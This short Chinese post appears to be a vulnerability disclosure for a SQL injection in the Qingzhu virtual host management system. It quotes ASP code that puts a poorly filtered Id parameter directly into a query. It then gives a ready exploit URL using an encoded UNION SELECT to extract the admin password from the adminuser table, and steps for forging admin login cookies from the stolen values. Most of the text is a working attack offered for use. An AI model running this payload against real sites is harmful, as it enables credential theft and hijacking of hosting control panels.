清竹虚拟主机管理系统sql注入漏洞

清竹虚拟主机管理系统sql注入漏洞 NCompany\Index.asp [php] loadfile_fromcache templatePath&"NCompany-Index.html" '加载index.html模板 TempCon=TempCon&Application("Qz_TP_"&templatePath&"NCompany-Index.html") Id=ReStrs(Request.QueryString("Id"))//过滤不严格 Set rs=Conn.Execute("Select * From [Qz_NComPany] Where [Id]="&Id)//直接带入sql语句 Address=rs("Address") TelInfo=rs("TelInfo") [/php] exp: [php]ncompany/index.asp?id=1%09union%09%se%lect%091,2,3,4,5,adminpass,7,8,9,10,11%09from%09adminuser%09where%09id=1[/php] 构造cookie: [php] AdminUser = 注入得来的adminuser PassWord = 注入得来的adminpass[/php]

发表评论